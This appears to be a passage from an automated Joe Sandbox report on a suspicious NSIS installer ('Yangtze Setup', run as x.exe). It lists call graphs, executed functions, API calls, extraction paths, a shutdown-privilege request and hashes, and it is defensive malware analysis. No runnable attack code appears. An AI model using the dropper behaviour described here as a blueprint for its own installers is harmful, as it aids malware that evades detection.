2984->2982 2998 401399 2984->2998 2985->2765 2987->2968 2989 405c08 21 API calls 2988->2989 2990 405a54 SetWindowTextA 2989->2990 2990->2971 2992 40601a 2991->2992 2993 406023 RegOpenKeyExA 2992->2993 2994 40601e 2992->2994 2993->2994 2994->2977 2994->2978 2996 4052b0 2995->2996 2997 4052a1 SendMessageA 2995->2997 2996->2984 2997->2996 2999 401413 2998->2999 3001 4013a3 2998->3001 2999->2984 3001->2999 3002 4013df MulDiv SendMessageA 3001->3002 3003 40154a 3001->3003 3002->3001 3004 4015ac 3003->3004 3055 4015b3 3003->3055 3005 4018a3 3004->3005 3006 401624 3004->3006 3007 4016a6 3004->3007 3008 4015cb 3004->3008 3009 40180c 3004->3009 3010 4017b0 3004->3010 3011 4015f1 3004->3011 3012 4016d3 3004->3012 3013 401694 3004->3013 3014 4016f5 3004->3014 3015 401875 3004->3015 3016 4018b6 3004->3016 3017 401618 SetForegroundWindow 3004->3017 3018 4015ba 3004->3018 3019 4015fd 3004->3019 3020 4015de 3004->3020 3021 40179f 3004->3021 3004->3055 3027 402e92 21 API calls 3005->3027 3052 402e56 21 API calls 3006->3052 3006->3055 3032 4016b5 ShowWindow 3007->3032 3033 4016bd 3007->3033 3022 4015d5 PostQuitMessage 3008->3022 3008->3055 3030 402e92 21 API calls 3009->3030 3026 402e92 21 API calls 3010->3026 3040 405a65 28 API calls 3011->3040 3119 402e92 3012->3119 3132 4062c9 wsprintfA 3013->3132 3024 402e92 21 API calls 3014->3024 3025 402e92 21 API calls 3015->3025 3029 402e92 21 API calls 3016->3029 3017->3055 3045 405a65 28 API calls 3018->3045 3018->3055 3116 402e56 3019->3116 3048 401399 70 API calls 3020->3048 3023 402e92 21 API calls 3021->3023 3022->3055 3035 4017a5 3023->3035 3036 4016fc 3024->3036 3037 40187c SearchPathA 3025->3037 3038 4017b7 3026->3038 3039 4018aa 3027->3039 3042 4018bd 3029->3042 3043 401812 GetFullPathNameA 3030->3043 3032->3033 3044 4016ca ShowWindow 3033->3044 3033->3055 3047 40627e 2 API calls 3035->3047 3124 406876 CharNextA CharNextA 3036->3124 3037->3055 3050 402e92 21 API calls 3038->3050 3051 406712 2 API calls 3039->3051 3040->3055 3041 401603 Sleep 3041->3055 3060 4018e2 3042->3060 3061 4018da 3042->3061 3053 401836 3043->3053 3054 40182b 3043->3054 3044->3055 3045->3055 3047->3055 3048->3055 3056 4017c0 3050->3056 3051->3055 3052->3055 3053->3054 3067 40627e 2 API calls 3053->3067 3054->3055 3057 401867 GetShortPathNameA 3054->3057 3055->3001 3059 402e92 21 API calls 3056->3059 3057->3055 3058 401762 3058->3011 3066 40176d 3058->3066 3063 4017c9 MoveFileA 3059->3063 3135 4067cb lstrcpynA 3060->3135 3134 4067cb lstrcpynA 3061->3134 3062 4062a5 CharNextA 3083 401704 3062->3083 3068 4017e1 3063->3068 3089 4017d5 3063->3089 3071 405a65 28 API calls 3066->3071 3072 401848 3067->3072 3068->3055 3075 40627e 2 API calls 3068->3075 3069 4018e0 3078 4069ae 5 API calls 3069->3078 3070 4018ed 3073 406207 3 API calls 3070->3073 3074 401774 3071->3074 3072->3054 3133 4067cb lstrcpynA 3072->3133 3077 4018f3 lstrcatA 3073->3077 3130 4067cb lstrcpynA 3074->3130 3082 4017f1 3075->3082 3076 405b8d 2 API calls 3076->3083 3077->3069 3107 4018ff 3078->3107 3081 4061ad 5 API calls 3081->3083 3082->3055 3085 405fa6 39 API calls 3082->3085 3083->3058 3083->3062 3083->3076 3083->3081 3086 401748 GetFileAttributesA 3083->3086 3093 40172f 3083->3093 3084 40177f SetCurrentDirectoryA 3084->3055 3085->3089 3086->3083 3087 401938 3136 40684e GetFileAttributesA 3087->3136 3088 405bad 2 API calls 3088->3093 3089->3011 3090 40627e 2 API calls 3090->3107 3093->3083 3093->3088 3094 401913 CompareFileTime 3094->3107 3095 4019e6 3097 405a65 28 API calls 3095->3097 3096 4019cd 3099 405a65 28 API calls 3096->3099 3100 4019f2 3097->3100 3098 4067cb lstrcpynA 3098->3107 3099->3055 3101 402f57 35 API calls 3100->3101 3102 401a08 3101->3102 3103 401a20 SetFileTime 3102->3103 3104 401a2e CloseHandle 3102->3104 3103->3104 3104->3055 3106 401a41 3104->3106 3105 405c08 21 API calls 3105->3107 3108 401a46 3106->3108 3109 401a57 3106->3109 3107->3018 3107->3087 3107->3090 3107->3094 3107->3095 3107->3096 3107->3098 3107->3105 3114 406759 MessageBoxIndirectA 3107->3114 3131 4065db GetFileAttributesA CreateFileA 3107->3131 3110 405c08 21 API calls 3108->3110 3111 405c08 21 API calls 3109->3111 3112 401a4e lstrcatA 3110->3112 3113 401a5f 3111->3113 3112->3113 3115 406759 MessageBoxIndirectA 3113->3115 3114->3107 3115->3055 3117 405c08 21 API calls 3116->3117 3118 402e6a 3117->3118 3118->3041 3120 405c08 21 API calls 3119->3120 3121 402ebb 3120->3121 3122 4016da SetFileAttributesA 3121->3122 3123 4069ae 5 API calls 3121->3123 3122->3055 3123->3122 3125 406891 3124->3125 3129 4068c1 3124->3129 3126 4068a1 3125->3126 3127 40689c CharNextA 3125->3127 3128 4062a5 CharNextA 3126->3128 3126->3129 3127->3129 3128->3126 3129->3083 3130->3084 3131->3107 3132->3055 3133->3054 3134->3069 3135->3070 3137 406870 3136->3137 3138 406860 SetFileAttributesA 3136->3138 3137->3107 3138->3137 3139->2797 3140->2797 3141->2784 3143 406085 GetShortPathNameA 3142->3143 3144 40605f 3142->3144 3146 406165 3143->3146 3147 40609a 3143->3147 3169 4065db GetFileAttributesA CreateFileA 3144->3169 3146->2800 3147->3146 3149 4060a2 wsprintfA 3147->3149 3148 406069 CloseHandle GetShortPathNameA 3148->3146 3150 40607d 3148->3150 3151 405c08 21 API calls 3149->3151 3150->3143 3150->3146 3152 4060cb 3151->3152 3170 4065db GetFileAttributesA CreateFileA 3152->3170 3154 4060d8 3154->3146 3155 4060e3 GetFileSize GlobalAlloc 3154->3155 3156 406102 3155->3156 3157 40615e CloseHandle 3155->3157 3158 406608 ReadFile 3156->3158 3157->3146 3159 40610a 3158->3159 3159->3157 3171 4067e7 lstrlenA lstrlenA 3159->3171 3162 40616a 3164 4067e7 3 API calls 3162->3164 3163 40611d lstrcpyA 3165 40612f 3163->3165 3164->3165 3166 406140 SetFilePointer 3165->3166 3167 4066c7 WriteFile 3166->3167 3168 406157 GlobalFree 3167->3168 3168->3157 3169->3148 3170->3154 3172 406119 3171->3172 3173 406806 3171->3173 3172->3162 3172->3163 3173->3172 3174 406833 lstrlenA 3173->3174 3174->3172 3174->3173 3175->2809 3176->2837 3177->2858 3179 40684e 2 API calls 3178->3179 3180 406240 3179->3180 3181 406250 RemoveDirectoryA 3180->3181 3182 406258 DeleteFileA 3180->3182 3183 406262 3180->3183 3184 40625e 3181->3184 3182->3184 3183->2867 3184->3183 3185 40626d SetFileAttributesA 3184->3185 3185->3183 3187 403b14 3186->3187 3188 4034c1 3187->3188 3189 403b19 FreeLibrary GlobalFree 3187->3189 3188->2877 3189->3188 3189->3189 3279 73ad103a 3280 73ad1052 3279->3280 3281 73ad10c4 3280->3281 3282 73ad1080 3280->3282 3283 73ad1060 3280->3283 3285 73ad1504 GlobalFree 3282->3285 3295 73ad1504 3283->3295 3290 73ad1078 3285->3290 3286 73ad1071 3287 73ad1504 GlobalFree 3286->3287 3287->3290 3288 73ad1090 GlobalSize 3289 73ad1099 3288->3289 3291 73ad109d GlobalAlloc 3289->3291 3293 73ad10ae 3289->3293 3290->3288 3290->3289 3292 73ad1558 3 API calls 3291->3292 3292->3293 3294 73ad10b7 GlobalFree 3293->3294 3294->3281 3297 73ad150a 3295->3297 3296 73ad1510 3296->3286 3297->3296 3298 73ad151c GlobalFree 3297->3298 3298->3286

                                                  Executed Functions

                                                  Function 004034CE Relevance: 94.9, APIs: 31, Strings: 23, Instructions: 418stringfilecomCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4034ce-403517 SetErrorMode GetVersionExA 1 403558 0->1 2 403519-40352f GetVersionExA 0->2 3 40355c 1->3 4 403531-40353e 2->4 5 40355f 2->5 3->5 8 403540-40354a 4->8 9 40354c-403556 4->9 6 403561-40356e 5->6 7 403582-403587 5->7 10 403570-403576 6->10 11 403578 6->11 12 403594 7->12 13 403589-403592 7->13 14 40357a 8->14 9->3 10->14 11->14 15 403598-4035df 12->15 13->15 14->7 16 4035e1-4035e9 call 4065a6 15->16 17 4035f2 15->17 16->17 23 4035eb 16->23 18 4035f7-403609 call 405f0b lstrlenA 17->18 24 40360b-403627 call 4065a6 * 3 18->24 23->17 31 403638-4036c4 #17 OleInitialize SHGetFileInfoA call 4067cb GetCommandLineA call 4067cb call 4062a5 CharNextA 24->31 32 403629-40362f 24->32 41 403760-403779 GetTempPathA call 403a98 31->41 42 4036ca 31->42 32->31 37 403631 32->37 37->31 48 4037e6-4037fb DeleteFileA call 4031c2 41->48 49 40377b-4037a1 GetWindowsDirectoryA lstrcatA call 403a98 41->49 43 4036cf-4036d2 42->43 46 4036d4-4036de 43->46 47 4036cc-4036cd 43->47 50 4036e0-4036e3 46->50 51 4036e7-4036f0 46->51 47->43 65 403801-403807 48->65 66 4039b3 48->66 49->48 63 4037a3-4037e0 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403a98 49->63 50->51 54 4036f2-4036f6 51->54 55 40372e-40373f call 4062a5 51->55 59 4036f8-4036fe 54->59 60 40370e-403714 54->60 74 403741-403742 55->74 75 403744-403746 55->75 67 403700-403702 59->67 68 403704 59->68 61 403725-40372c 60->61 62 403716-40371c 60->62 61->55 72 40374a-403757 call 4067cb 61->72 69 403722 62->69 70 40371e-403720 62->70 63->48 63->66 76 403809-403817 call 4062a5 65->76 77 40385b-403862 call 405784 65->77 71 4039b7-4039c4 call 4034a4 OleUninitialize 66->71 67->60 67->68 68->60 69->61 70->61 70->69 88 4039f6-4039fd 71->88 89 4039c6-4039d1 call 406759 71->89 85 40375c 72->85 74->75 75->43 80 403748 75->80 90 403822-403824 76->90 86 403867-403869 77->86 80->85 85->41 86->71 94 403a03-403a19 GetCurrentProcess OpenProcessToken 88->94 95 403a84-403a93 88->95 101 4039d3 ExitProcess 89->101 91 403826-40382d 90->91 92 403819-40381f 90->92 98 40386e-403895 call 4061ad lstrlenA call 4067cb 91->98 99 40382f-40383d call 4062e2 91->99 92->91 102 403821 92->102 96 403a52-403a60 call 4065a6 94->96 97 403a1b-403a4c LookupPrivilegeValueA AdjustTokenPrivileges 94->97 95->101 110 403a70-403a7b ExitWindowsEx 96->110 111 403a62-403a6e 96->111 97->96 116 4038a6-4038af 98->116 117 403897-4038a1 call 4067cb 98->117 99->66 112 403843-403859 call 4067cb * 2 99->112 102->90 110->95 115 403a7d-403a7f call 401533 110->115 111->110 111->115 112->77 115->95 122 4038b3-4038b5 116->122 117->116 124 4038b8-4038e7 wsprintfA call 405c08 122->124 128 4038f0 call 405b8d 124->128 129 4038e9-4038ee call 405bad 124->129 133 4038f5-4038f7 128->133 129->133 134 403942-40396d SetCurrentDirectoryA call 405fa6 CopyFileA 133->134 135 4038f9-403909 GetFileAttributesA 133->135 134->66 143 40396f-403995 call 405fa6 call 405c08 call 40637b 134->143 136 4039d9-4039e1 135->136 137 40390f-40391c DeleteFileA 135->137 136->122 141 4039e7 136->141 137->136 139 403922-403933 call 4063be 137->139 139->136 146 403939-40393d 139->146 141->66 151 40399a-40399c 143->151 146->124 152 4039e9-4039f4 CloseHandle 151->152 153 40399e-4039a3 151->153 152->71 153->66 154 4039a5-4039b1 call 40627e 153->154 154->66 154->146
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004034EA
                                                  • GetVersionExA.KERNEL32 ref: 00403513
                                                  • GetVersionExA.KERNEL32(?), ref: 00403526
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035FE
                                                  • #17.COMCTL32(00000008,0000000A,0000000C), ref: 00403638
                                                  • OleInitialize.OLE32(00000000), ref: 0040363F
                                                  • SHGetFileInfoA.SHELL32(0040844B,00000000,?,00000160,00000000), ref: 0040365E
                                                  • GetCommandLineA.KERNEL32(Yangtze Setup,NSIS Error), ref: 00403673
                                                  • CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\x.exe" ,00000000,"C:\Users\user\AppData\Local\Temp\x.exe" ,00000000), ref: 004036B2
                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403770
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403785
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403795
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037AD
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004037BA
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004037CB
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004037D7
                                                  • DeleteFileA.KERNELBASE(1033), ref: 004037EB
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\x.exe" ,00000000,00000000), ref: 0040387C
                                                    • Part of subcall function 004067CB: lstrcpynA.KERNEL32(?,?,00000400,00403673,Yangtze Setup,NSIS Error), ref: 004067D8
                                                  • wsprintfA.USER32 ref: 004038BF
                                                  • GetFileAttributesA.KERNEL32(007A4400,C:\Users\user\AppData\Local\Temp\), ref: 004038FE
                                                  • DeleteFileA.KERNEL32(007A4400), ref: 00403914
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403947
                                                  • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\x.exe,007A4400,00000001), ref: 00403965
                                                  • OleUninitialize.OLE32(00000000), ref: 004039BC
                                                  • ExitProcess.KERNEL32 ref: 004039D3
                                                  • CloseHandle.KERNEL32(00000000,007A4800,007A4800,?,007A4400,00000000), ref: 004039EA
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A0A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A11
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A27
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A4C
                                                    • Part of subcall function 004065A6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                    • Part of subcall function 004065A6: GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CurrentDeleteDirectoryEnvironmentExitHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AddressAdjustAttributesCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValuelstrcpynwsprintf
                                                  • String ID: $ /D=$ _?=$"C:\Users\user\AppData\Local\Temp\x.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\x.exe$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NCRC$NSIS Error$S$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Yangtze Setup$\Temp$~nsu%X.tmp
                                                  • API String ID: 2165876562-3400316289
                                                  • Opcode ID: 5eac1001b5c07145413e0ee7b15dc13d7c7d36d5099346ac16104c99028e437e
                                                  • Instruction ID: a5c19df252211d4c9837bbb42cfa46bf09b889b785ddbe25f9e1859c41af8b13
                                                  • Opcode Fuzzy Hash: 5eac1001b5c07145413e0ee7b15dc13d7c7d36d5099346ac16104c99028e437e
                                                  • Instruction Fuzzy Hash: CAE127B06043416AD7206F719D46B2B3ED8AF8574AF05453EF582B72D2DB7C8905C72E
                                                  Function 73AD2288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667stringlibrarymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 73AD12C6: GlobalAlloc.KERNEL32(00000040,73AD11C4,-000000A0), ref: 73AD12CE
                                                  • lstrcpyA.KERNEL32(?,?), ref: 73AD27C0
                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73AD281B
                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 73AD286B
                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 73AD2876
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD2887
                                                  • GlobalFree.KERNEL32(?), ref: 73AD2901
                                                  • GlobalFree.KERNEL32(?), ref: 73AD2907
                                                  • GlobalFree.KERNEL32(?), ref: 73AD290D
                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 73AD29D7
                                                  • LoadLibraryA.KERNEL32(00000008), ref: 73AD29E8
                                                  • GetProcAddress.KERNEL32(?,?), ref: 73AD2A3C
                                                  • lstrlenA.KERNEL32(00000408), ref: 73AD2A57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID: :
                                                  • API String ID: 245916457-336475711
                                                  • Opcode ID: be946c5f1ed83a502a81a5f07eddf96f8d169bd5ae2ac84d8cca5f4df950c029
                                                  • Instruction ID: 83c7adf9bdc2caf24108e1ef76a388aa2b0783311f9ff17b1ef6d0e01fe51d4e
                                                  • Opcode Fuzzy Hash: be946c5f1ed83a502a81a5f07eddf96f8d169bd5ae2ac84d8cca5f4df950c029
                                                  • Instruction Fuzzy Hash: 5E32C071A2830A9FD359CF34C44275ABBF5FB89714F048A2FE49A8229CDB34C945CB91
                                                  Function 004063BE Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 773 4063be-4063e7 call 4062e2 776 406400-40640a 773->776 777 4063e9-4063fb DeleteFileA 773->777 779 40640c-40640e 776->779 780 40641d-406430 call 4067cb 776->780 778 40659a-4065a3 777->778 781 406414-406417 779->781 782 406589-40658f 779->782 787 406440-406441 call 406983 780->787 788 406432-40643e lstrcatA 780->788 781->780 785 406553-40655b call 40627e 781->785 784 406599 782->784 784->778 785->784 795 40655d-406571 call 406207 call 406234 785->795 790 406446-406449 787->790 788->790 793 406454-40645a lstrcatA 790->793 794 40644b-406452 790->794 796 40645c-406481 lstrlenA FindFirstFileA 793->796 794->793 794->796 806 406591-406594 call 405a65 795->806 807 406573-406575 795->807 798 406541-406546 796->798 799 406487-406498 call 4062a5 796->799 798->784 801 406548-406551 798->801 808 40649a-4064ac 799->808 809 4064ae-4064b2 799->809 801->782 801->785 806->784 807->782 810 406577-406587 call 405a65 call 405fa6 807->810 808->809 812 4064b4-4064b9 809->812 813 4064c5-4064d5 call 4067cb 809->813 810->784 816 4064bb-4064bd 812->816 817 40651c 812->817 822 4064d7-4064de 813->822 823 4064e9-4064f2 call 406234 813->823 816->813 821 4064bf-4064c3 816->821 820 406520-406531 FindNextFileA 817->820 820->799 825 406537-40653b FindClose 820->825 821->813 821->817 822->820 826 4064e0-4064e7 call 4063be 822->826 832 406512-40651a call 405a65 823->832 833 4064f4-4064f6 823->833 825->798 826->820 832->820 835 4064f8-406508 call 405a65 call 405fa6 833->835 836 40650a-406510 833->836 835->820 836->820
                                                  APIs
                                                    • Part of subcall function 004062E2: lstrlenA.KERNEL32(007A0288,00000000,007A0288,007A0288,00000000,?,?,004063E0,?,00000000,76763410,?), ref: 00406331
                                                    • Part of subcall function 004062E2: GetFileAttributesA.KERNELBASE(007A0288,007A0288), ref: 00406342
                                                  • DeleteFileA.KERNELBASE(?,?,00000000,76763410,?), ref: 004063EA
                                                  • lstrcatA.KERNEL32(0079FE88,\*.*,0079FE88,?,00000000,?,00000000,76763410,?), ref: 0040643C
                                                  • lstrcatA.KERNEL32(?,00408298,?,0079FE88,?,00000000,?,00000000,76763410,?), ref: 0040645A
                                                  • lstrlenA.KERNEL32(?), ref: 0040645D
                                                  • FindFirstFileA.KERNELBASE(0079FE88,?), ref: 00406474
                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?,?,?), ref: 00406529
                                                  • FindClose.KERNEL32(?), ref: 0040653B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                  • String ID: \*.*
                                                  • API String ID: 2636146433-1173974218
                                                  • Opcode ID: b5c7823396ab46e5e66f91f9c6a27da860686660231846df4d592b55ece77099
                                                  • Instruction ID: 79bda7e18d67c42f643aba5fade223b272ce6f3e2ee0b5a296a09adfd4973917
                                                  • Opcode Fuzzy Hash: b5c7823396ab46e5e66f91f9c6a27da860686660231846df4d592b55ece77099
                                                  • Instruction Fuzzy Hash: 40515A301047497AD7207F659C05BAB3B98AF86318F06053FF883B12D2D73C9A6586AF
                                                  Function 0040627E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(00000000,007A1288,00000000,00406321,007A0288), ref: 00406289
                                                  • FindClose.KERNEL32(00000000), ref: 00406295
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 41dc207c5cb6b58768c91f9aebba15c55274e683e2e88ab0145a438517cca93f
                                                  • Instruction ID: f623c19fda099c5e2075eae02ae39d9101d70c1d06fdd6fb1b44e72f335484d6
                                                  • Opcode Fuzzy Hash: 41dc207c5cb6b58768c91f9aebba15c55274e683e2e88ab0145a438517cca93f
                                                  • Instruction Fuzzy Hash: 6FD012315041205BC78067386E0C84B7A999FA93327114B7AF0AAF11E0CA788C7296A8
                                                  Function 00405784 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 216stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 157 405784-40579c call 4065a6 160 4057b0-4057dc call 406637 157->160 161 40579e-4057ae call 4062c9 157->161 166 4057f4-4057fa lstrcatA 160->166 167 4057de-4057ef call 406637 160->167 170 4057ff-405828 call 4056c5 call 4062e2 161->170 166->170 167->166 175 4058b2-4058ba call 4062e2 170->175 176 40582e-405833 170->176 182 4058c8-4058f6 LoadImageA 175->182 183 4058bc-4058c3 call 405c08 175->183 176->175 177 405835-40585b call 406637 176->177 177->175 184 40585d-40585f 177->184 186 405975-40597d call 401533 182->186 187 4058f8-405923 RegisterClassA 182->187 183->182 188 405870-40587d lstrlenA 184->188 189 405861-40586e call 4062a5 184->189 198 405983-40598e call 4056c5 186->198 199 405a2f-405a31 186->199 190 405925-405927 187->190 191 40592c-405970 SystemParametersInfoA CreateWindowExA 187->191 194 4058a5-4058ad call 406207 call 4067cb 188->194 195 40587f-40588d lstrcmpiA 188->195 189->188 196 405a32-405a39 190->196 191->186 194->175 195->194 202 40588f-405899 GetFileAttributesA 195->202 210 405994-4059ae ShowWindow call 405f0b 198->210 211 